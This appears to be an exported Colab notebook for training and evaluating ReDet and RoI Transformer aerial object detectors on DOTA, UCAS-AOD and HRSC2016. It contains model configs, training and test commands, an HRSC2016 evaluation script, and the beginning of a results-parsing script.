# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=[
dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssignerRbbox',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomRbboxSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False)
])
test_cfg = dict(
rpn=dict(
# TODO: test nms 2000
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
# score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)
        score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=2000)
# score_thr = 0.001, nms = dict(type='pesudo_nms_poly', iou_thr=0.9), max_per_img = 2000)
# score_thr = 0.001, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'UCASAOD'
######################################################################################################################
# data_root = '/content/ReDet/data/dota1_1024/'
# data_root = '/content/ReDet/data/dota_redet/'
data_root = '/content/ReDet/data/UCAS-AOD/'
######################################################################################################################
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'Train/mmtrain.json',
img_prefix=data_root + 'Train/images/',
img_scale=(659, 1280),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0.5,
with_mask=True,
with_crowd=True,
with_label=True),
val=dict(
type=dataset_type,
ann_file=data_root + 'val/mmval.json',
img_prefix=data_root + 'val/images',
img_scale=(659, 1280),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=True,
with_crowd=True,
with_label=True),
test=dict(
type=dataset_type,
#############################################################################################
ann_file=data_root + 'Test/mmtest.json',
# ann_file=data_root + 'val1024/DOTA_val1024.json',
img_prefix=data_root + 'Test/images',
# img_prefix=data_root + 'val1024/images',
# ann_file=data_root + 'test1024_ms/DOTA_test1024_ms.json',
# img_prefix=data_root + 'test1024_ms/images',
img_scale=(659, 1280),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_label=False,
test_mode=True))
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=6)
# yapf:disable
log_config = dict(
interval=6,
hooks=[
dict(type='TextLoggerHook'),
dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD'
load_from = None
resume_from = None
workflow = [('train', 1)]
# %pycat /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py
# %%writefile /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD_659.py
########## This config is adapted from the original repository
# model settings
model = dict(
type='RoITransformer',
pretrained='modelzoo://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=3,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],
reg_class_agnostic=True,
with_module=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),
rbbox_roi_extractor=dict(
type='RboxSingleRoIExtractor',
roi_layer=dict(type='RoIAlignRotated', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
rbbox_head = dict(
type='SharedFCBBoxHeadRbbox',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=3,
target_means=[0., 0., 0., 0., 0.],
target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))
)
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=[
dict(
assigner=dict(
type='MaxIoUAssignerCy',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False),
dict(
assigner=dict(
type='MaxIoUAssignerRbbox',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomRbboxSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False)
])
test_cfg = dict(
rpn=dict(
# TODO: test nms 2000
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
# score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)
        score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=2000)
# score_thr = 0.001, nms = dict(type='pesudo_nms_poly', iou_thr=0.9), max_per_img = 2000)
# score_thr = 0.001, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'UCASAOD'
######################################################################################################################
# data_root = '/content/ReDet/data/dota1_1024/'
# data_root = '/content/ReDet/data/dota_redet/'
data_root = '/content/ReDet/data/UCAS_AOD659/'
######################################################################################################################
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'trainval659/DOTA_trainval659.json',
img_prefix=data_root + 'trainval659/images/',
img_scale=(659, 659),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0.5,
with_mask=True,
with_crowd=True,
with_label=True),
val=dict(
type=dataset_type,
ann_file=data_root + 'trainval659/DOTA_trainval659.json',
img_prefix=data_root + 'trainval659/images',
img_scale=(659, 659),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=True,
with_crowd=True,
with_label=True),
test=dict(
type=dataset_type,
#############################################################################################
ann_file=data_root + 'test659/DOTA_test659.json',
# ann_file=data_root + 'val1024/DOTA_val1024.json',
img_prefix=data_root + 'test659/images',
# img_prefix=data_root + 'val1024/images',
# ann_file=data_root + 'test1024_ms/DOTA_test1024_ms.json',
# img_prefix=data_root + 'test1024_ms/images',
img_scale=(659, 659),
img_norm_cfg=img_norm_cfg,
size_divisor=32,
flip_ratio=0,
with_mask=False,
with_label=False,
test_mode=True))
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=6)
# yapf:disable
log_config = dict(
interval=6,
hooks=[
dict(type='TextLoggerHook'),
dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 36
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD_659'
load_from = None
resume_from = None
workflow = [('train', 1)]
```
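All the configs above share the same `img_norm_cfg` (ImageNet channel statistics, applied in RGB order since `to_rgb=True`). A minimal sketch of what the normalization step does to a pixel, illustrative rather than the actual mmdet `Normalize` transform:

```python
import numpy as np

# values from img_norm_cfg in the configs above
mean = np.array([123.675, 116.28, 103.53])
std = np.array([58.395, 57.12, 57.375])

def normalize(img_rgb):
    """Per-channel (img - mean) / std, applied after BGR -> RGB conversion."""
    return (img_rgb.astype(np.float64) - mean) / std

pixel = np.array([[123.675, 116.28, 103.53]])  # a pixel equal to the mean
print(normalize(pixel))  # maps to (0, 0, 0)
```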
# Training the network
```
!python tools/train.py /content/AerialDetection/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py --resume_from /content/AerialDetection/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_11.pth
!mv /content/AerialDetection/data/dota /content/drive/MyDrive/dota_dataaaaa
```
# UCAS_AOD training
```
%cd /content/ReDet
!python tools/train.py /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py \
# --resume_from /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/epoch_6.pth
%cd /content/ReDet
!python tools/train.py /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD_659.py \
# --resume_from /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/epoch_6.pth
```
# Testing the network
ReDet_re50_refpn_1x_dota1 test
```
!python /content/ReDet/tools/test.py /content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py \
/content/ReDet/work_dirs/pth/ReDet_re50_refpn_1x_dota1-a025e6b1.pth --out /content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/results.pkl
!python /content/ReDet/tools/test.py /content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py \
/content/ReDet/work_dirs/pth/ReDet_re50_refpn_1x_dota1-a025e6b1.pth --out /content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/valresults.pkl
```
faster_rcnn_RoITrans_r50_fpn_1x_dota test
```
!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py \
/content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/results.pkl
#new-----dotanew1024
!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py \
/content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/results.pkl
#val
!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py \
/content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/valresults.pkl
```
faster_rcnn_obb_r50_fpn_1x_dota.py test
```
!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py \
/content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/results.pkl
#new-----dotanew1024
!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py \
/content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/results.pkl
#val
!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py \
/content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/valresults.pkl
```
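The `--out` flag above makes `tools/test.py` pickle the raw detections. A minimal sketch of inspecting such a file, assuming (as in mmdetection-style codebases) it holds one entry per image with one array of detections per class:

```python
import pickle
import numpy as np

# stand-in results: 2 images, 3 classes; rows here assumed [x1, y1, x2, y2, angle, score]
fake_results = [
    [np.zeros((0, 6)), np.array([[10., 10., 50., 50., 0., 0.9]]), np.zeros((0, 6))]
    for _ in range(2)
]
with open('results_demo.pkl', 'wb') as f:
    pickle.dump(fake_results, f)

with open('results_demo.pkl', 'rb') as f:
    results = pickle.load(f)

num_dets = sum(len(per_cls) for per_img in results for per_cls in per_img)
print(f'{len(results)} images, {num_dets} detections')  # 2 images, 2 detections
```

The exact row layout (angle column, score position) depends on the rbbox head, so treat the column names here as assumptions.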
# faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD **testing**
```
!python /content/ReDet/tools/test.py /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py \
/content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/epoch_36.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/results.pkl
```
# **HRSC2016** ReDet
```
# generate results
!python /content/ReDet/tools/test.py /content/ReDet/configs/ReDet/ReDet_re50_refpn_3x_hrsc2016.py \
/content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016/ReDet_re50_refpn_3x_hrsc2016-d1b4bd29.pth --out /content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016/results.pkl
# evaluation
# remember to modify the results path in hrsc2016_evaluation.py
# !python /content/ReDet/DOTA_devkit/hrsc2016_evaluation.py
```
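`hrsc2016_evaluation.py` (written below) scores detections with VOC-style AP; its `voc_ap` has an all-points branch (`use_07_metric=False`) alongside the 11-point one. A toy standalone run of that precision-envelope computation:

```python
import numpy as np

def all_points_ap(rec, prec):
    """All-points VOC AP: monotone precision envelope, then area under P-R."""
    mrec = np.concatenate(([0.], rec, [1.]))
    mpre = np.concatenate(([0.], prec, [0.]))
    for i in range(mpre.size - 1, 0, -1):   # make precision non-increasing
        mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
    i = np.where(mrec[1:] != mrec[:-1])[0]  # points where recall changes
    return np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])

# a detector that finds half the objects at perfect precision scores AP = 0.5
print(all_points_ap(np.array([0.25, 0.5]), np.array([1.0, 1.0])))  # 0.5
```

Note that `main()` below calls `voc_eval` with `use_07_metric=True`, so the reported HRSC2016 numbers use the 11-point variant instead.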
/content/ReDet/DOTA_devkit/hrsc2016_evaluation.py
```
%%writefile /content/ReDet/DOTA_devkit/hrsc2016_evaluation.py
# --------------------------------------------------------
# dota_evaluation_task1
# Licensed under The MIT License [see LICENSE for details]
# Written by Jian Ding, based on code from Bharath Hariharan
# --------------------------------------------------------
"""
To use the code, users should configure detpath, annopath and imagesetfile.
detpath is the path for the 15 result files; for the format, refer to "http://captain.whu.edu.cn/DOTAweb/tasks.html".
Search for PATH_TO_BE_CONFIGURED to configure the paths.
Note: the evaluation is done on the large-scale images.
"""
import xml.etree.ElementTree as ET
import os
#import cPickle
import numpy as np
import matplotlib.pyplot as plt
import polyiou
from functools import partial
def parse_gt(filename):
"""
:param filename: ground truth file to parse
:return: all instances in a picture
"""
objects = []
with open(filename, 'r') as f:
while True:
line = f.readline()
if line:
splitlines = line.strip().split(' ')
object_struct = {}
if (len(splitlines) < 9):
continue
object_struct['name'] = splitlines[8]
if (len(splitlines) == 9):
object_struct['difficult'] = 0
elif (len(splitlines) == 10):
object_struct['difficult'] = int(splitlines[9])
object_struct['bbox'] = [float(splitlines[0]),
float(splitlines[1]),
float(splitlines[2]),
float(splitlines[3]),
float(splitlines[4]),
float(splitlines[5]),
float(splitlines[6]),
float(splitlines[7])]
objects.append(object_struct)
else:
break
return objects
def voc_ap(rec, prec, use_07_metric=False):
""" ap = voc_ap(rec, prec, [use_07_metric])
Compute VOC AP given precision and recall.
If use_07_metric is true, uses the
VOC 07 11 point method (default:False).
"""
if use_07_metric:
# 11 point metric
ap = 0.
for t in np.arange(0., 1.1, 0.1):
if np.sum(rec >= t) == 0:
p = 0
else:
p = np.max(prec[rec >= t])
ap = ap + p / 11.
else:
# correct AP calculation
# first append sentinel values at the end
mrec = np.concatenate(([0.], rec, [1.]))
mpre = np.concatenate(([0.], prec, [0.]))
# compute the precision envelope
for i in range(mpre.size - 1, 0, -1):
mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
def voc_eval(detpath,
annopath,
imagesetfile,
classname,
# cachedir,
ovthresh=0.5,
use_07_metric=False):
"""rec, prec, ap = voc_eval(detpath,
annopath,
imagesetfile,
classname,
[ovthresh],
[use_07_metric])
Top level function that does the PASCAL VOC evaluation.
detpath: Path to detections
detpath.format(classname) should produce the detection results file.
annopath: Path to annotations
annopath.format(imagename) should be the xml annotations file.
imagesetfile: Text file containing the list of images, one image per line.
classname: Category name (duh)
cachedir: Directory for caching the annotations
[ovthresh]: Overlap threshold (default = 0.5)
[use_07_metric]: Whether to use VOC07's 11 point AP computation
(default False)
"""
# assumes detections are in detpath.format(classname)
# assumes annotations are in annopath.format(imagename)
# assumes imagesetfile is a text file with each line an image name
# cachedir caches the annotations in a pickle file
# first load gt
#if not os.path.isdir(cachedir):
# os.mkdir(cachedir)
#cachefile = os.path.join(cachedir, 'annots.pkl')
# read list of images
with open(imagesetfile, 'r') as f:
lines = f.readlines()
imagenames = [x.strip() for x in lines]
#print('imagenames: ', imagenames)
#if not os.path.isfile(cachefile):
# load annots
recs = {}
for i, imagename in enumerate(imagenames):
#print('parse_files name: ', annopath.format(imagename))
recs[imagename] = parse_gt(annopath.format(imagename))
#if i % 100 == 0:
# print ('Reading annotation for {:d}/{:d}'.format(
# i + 1, len(imagenames)) )
# save
#print ('Saving cached annotations to {:s}'.format(cachefile))
#with open(cachefile, 'w') as f:
# cPickle.dump(recs, f)
#else:
# load
#with open(cachefile, 'r') as f:
# recs = cPickle.load(f)
# extract gt objects for this class
class_recs = {}
npos = 0
for imagename in imagenames:
R = [obj for obj in recs[imagename] if obj['name'] == classname]
bbox = np.array([x['bbox'] for x in R])
        difficult = np.array([x['difficult'] for x in R]).astype(bool)
det = [False] * len(R)
npos = npos + sum(~difficult)
class_recs[imagename] = {'bbox': bbox,
'difficult': difficult,
'det': det}
# read dets from Task1* files
detfile = detpath.format(classname)
with open(detfile, 'r') as f:
lines = f.readlines()
splitlines = [x.strip().split(' ') for x in lines]
image_ids = [x[0] for x in splitlines]
confidence = np.array([float(x[1]) for x in splitlines])
#print('check confidence: ', confidence)
BB = np.array([[float(z) for z in x[2:]] for x in splitlines])
# sort by confidence
sorted_ind = np.argsort(-confidence)
sorted_scores = np.sort(-confidence)
#print('check sorted_scores: ', sorted_scores)
#print('check sorted_ind: ', sorted_ind)
## note the usage only in numpy not for list
BB = BB[sorted_ind, :]
image_ids = [image_ids[x] for x in sorted_ind]
#print('check imge_ids: ', image_ids)
#print('imge_ids len:', len(image_ids))
# go down dets and mark TPs and FPs
nd = len(image_ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
for d in range(nd):
##############################################################################################################
filename, file_extension = os.path.splitext(image_ids[d])
        R = class_recs[filename]
# R = class_recs[image_ids[d]]##############################################################################
bb = BB[d, :].astype(float)
ovmax = -np.inf
BBGT = R['bbox'].astype(float)
## compute det bb with each BBGT
if BBGT.size > 0:
# compute overlaps
# intersection
# 1. calculate the overlaps between hbbs, if the iou between hbbs are 0, the iou between obbs are 0, too.
# pdb.set_trace()
BBGT_xmin = np.min(BBGT[:, 0::2], axis=1)
BBGT_ymin = np.min(BBGT[:, 1::2], axis=1)
BBGT_xmax = np.max(BBGT[:, 0::2], axis=1)
BBGT_ymax = np.max(BBGT[:, 1::2], axis=1)
bb_xmin = np.min(bb[0::2])
bb_ymin = np.min(bb[1::2])
bb_xmax = np.max(bb[0::2])
bb_ymax = np.max(bb[1::2])
ixmin = np.maximum(BBGT_xmin, bb_xmin)
iymin = np.maximum(BBGT_ymin, bb_ymin)
ixmax = np.minimum(BBGT_xmax, bb_xmax)
iymax = np.minimum(BBGT_ymax, bb_ymax)
iw = np.maximum(ixmax - ixmin + 1., 0.)
ih = np.maximum(iymax - iymin + 1., 0.)
inters = iw * ih
# union
uni = ((bb_xmax - bb_xmin + 1.) * (bb_ymax - bb_ymin + 1.) +
(BBGT_xmax - BBGT_xmin + 1.) *
(BBGT_ymax - BBGT_ymin + 1.) - inters)
overlaps = inters / uni
BBGT_keep_mask = overlaps > 0
BBGT_keep = BBGT[BBGT_keep_mask, :]
BBGT_keep_index = np.where(overlaps > 0)[0]
# pdb.set_trace()
def calcoverlaps(BBGT_keep, bb):
overlaps = []
for index, GT in enumerate(BBGT_keep):
overlap = polyiou.iou_poly(polyiou.VectorDouble(BBGT_keep[index]), polyiou.VectorDouble(bb))
overlaps.append(overlap)
return overlaps
if len(BBGT_keep) > 0:
overlaps = calcoverlaps(BBGT_keep, bb)
ovmax = np.max(overlaps)
jmax = np.argmax(overlaps)
# pdb.set_trace()
jmax = BBGT_keep_index[jmax]
if ovmax > ovthresh:
if not R['difficult'][jmax]:
if not R['det'][jmax]:
tp[d] = 1.
R['det'][jmax] = 1
else:
fp[d] = 1.
else:
fp[d] = 1.
# compute precision recall
print('check fp:', fp)
print('check tp', tp)
print('npos num:', npos)
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / float(npos)
# avoid divide by zero in case the first detection matches a difficult
# ground truth
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = voc_ap(rec, prec, use_07_metric)
return rec, prec, ap
def main():
detpath = r'/content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016/Task1_{:s}.txt'
annopath = r'/content/ReDet/data/HRSC2016/Test/labelTxt/{:s}.txt' # change the directory to the path of val/labelTxt, if you want to do evaluation on the valset
imagesetfile = r'/content/ReDet/data/HRSC2016/Test/test.txt'
# For HRSC2016
classnames = ['ship']
classaps = []
map = 0
for classname in classnames:
print('classname:', classname)
rec, prec, ap = voc_eval(detpath,
annopath,
imagesetfile,
classname,
ovthresh=0.5,
use_07_metric=True)
map = map + ap
#print('rec: ', rec, 'prec: ', prec, 'ap: ', ap)
print('ap: ', ap)
classaps.append(ap)
# uncomment to show the p-r curve of each category
# plt.figure(figsize=(8,4))
# plt.xlabel('recall')
# plt.ylabel('precision')
# plt.plot(rec, prec)
# plt.show()
map = map/len(classnames)
print('map:', map)
classaps = 100*np.array(classaps)
print('classaps: ', classaps)
if __name__ == '__main__':
main()
# evaluation
# remember to modify the results path in hrsc2016_evaluation.py
!python /content/ReDet/DOTA_devkit/hrsc2016_evaluation.py
```
# To parse the **validation** results file, run the code below
```
# %pycat /content/AerialDetection/tools/parse_results.py
%%writefile /content/ReDet/tools/parse_results.py
from __future__ import division
import argparse
import os.path as osp
import shutil
import tempfile
import mmcv
from mmdet.apis import init_dist
from mmdet.core import results2json, coco_eval, \
HBBSeg2Comp4, OBBDet2Comp4, OBBDetComp4, \
HBBOBB2Comp4, HBBDet2Comp4
from mmdet import __version__
from mmdet.datasets import get_dataset
from mmdet.apis import (train_detector, init_dist, get_root_logger,
set_random_seed)
from mmdet.models import build_detector
import torch
import json
from mmcv import Config
import sys
# sys.path.insert(0, '../')
# import DOTA_devkit.ResultMerge_multi_process as RM
from DOTA_devkit.ResultMerge_multi_process import *
# import pdb; pdb.set_trace()
def parse_args():
parser = argparse.ArgumentParser(description='Train a detector')
parser.add_argument('--config', default='configs/DOTA/faster_rcnn_r101_fpn_1x_dota2_v3_RoITrans_v5.py')
parser.add_argument('--type', default=r'HBB',
help='parse type of detector')
args = parser.parse_args()
return args
def OBB2HBB(srcpath, dstpath):
filenames = util.GetFileFromThisRootDir(srcpath)
if not os.path.exists(dstpath):
os.makedirs(dstpath)
for file in filenames:
with open(file, 'r') as f_in:
with open(os.path.join(dstpath, os.path.basename(os.path.splitext(file)[0]) + '.txt'), 'w') as f_out:
lines = f_in.readlines()
splitlines = [x.strip().split() for x in lines]
for index, splitline in enumerate(splitlines):
imgname = splitline[0]
score = splitline[1]
poly = splitline[2:]
poly = list(map(float, poly))
xmin, xmax, ymin, ymax = min(poly[0::2]), max(poly[0::2]), min(poly[1::2]), max(poly[1::2])
rec_poly = [xmin, ymin, xmax, ymax]
outline = imgname + ' ' + score + ' ' + ' '.join(map(str, rec_poly))
if index != (len(splitlines) - 1):
outline = outline + '\n'
f_out.write(outline)
def parse_results(config_file, resultfile, dstpath, type):
cfg = Config.fromfile(config_file)
data_test = cfg.data['test']
dataset = get_dataset(data_test)
outputs = mmcv.load(resultfile)
if type == 'OBB':
# dota1 has tested
obb_results_dict = OBBDetComp4(dataset, outputs)
current_thresh = 0.1
elif type == 'HBB':
# dota1 has tested
hbb_results_dict = HBBDet2Comp4(dataset, outputs)
elif type == 'HBBOBB':
# dota1 has tested
# dota2
hbb_results_dict, obb_results_dict = HBBOBB2Comp4(dataset, outputs)
current_thresh = 0.3
elif type == 'Mask':
# TODO: dota1 did not pass
# dota2, hbb has passed, obb has passed
hbb_results_dict, obb_results_dict = HBBSeg2Comp4(dataset, outputs)
current_thresh = 0.3
dataset_type = cfg.dataset_type
if 'obb_results_dict' in vars():
if not os.path.exists(os.path.join(dstpath, 'Task1_results')):
os.makedirs(os.path.join(dstpath, 'Task1_results'))
for cls in obb_results_dict:
with open(os.path.join(dstpath, 'Task1_results', cls + '.txt'), 'w') as obb_f_out:
for index, outline in enumerate(obb_results_dict[cls]):
if index != (len(obb_results_dict[cls]) - 1):
obb_f_out.write(outline + '\n')
else:
obb_f_out.write(outline)
if not os.path.exists(os.path.join(dstpath, 'Task1_results_nms')):
os.makedirs(os.path.join(dstpath, 'Task1_results_nms'))
mergebypoly_multiprocess(os.path.join(dstpath, 'Task1_results'),
os.path.join(dstpath, 'Task1_results_nms'), nms_type=r'py_cpu_nms_poly_fast', o_thresh=current_thresh)
OBB2HBB(os.path.join(dstpath, 'Task1_results_nms'),
os.path.join(dstpath, 'Transed_Task2_results_nms'))
if 'hbb_results_dict' in vars():
if not os.path.exists(os.path.join(dstpath, 'Task2_results')):
os.makedirs(os.path.join(dstpath, 'Task2_results'))
for cls in hbb_results_dict:
with open(os.path.join(dstpath, 'Task2_results', cls + '.txt'), 'w') as f_out:
for index, outline in enumerate(hbb_results_dict[cls]):
if index != (len(hbb_results_dict[cls]) - 1):
f_out.write(outline + '\n')
else:
f_out.write(outline)
if not os.path.exists(os.path.join(dstpath, 'Task2_results_nms')):
os.makedirs(os.path.join(dstpath, 'Task2_results_nms'))
mergebyrec(os.path.join(dstpath, 'Task2_results'),
os.path.join(dstpath, 'Task2_results_nms'))
if __name__ == '__main__':
args = parse_args()
config_file = args.config
config_name = os.path.splitext(os.path.basename(config_file))[0]
######################################################################################/content/AerialDetection/work_dirs
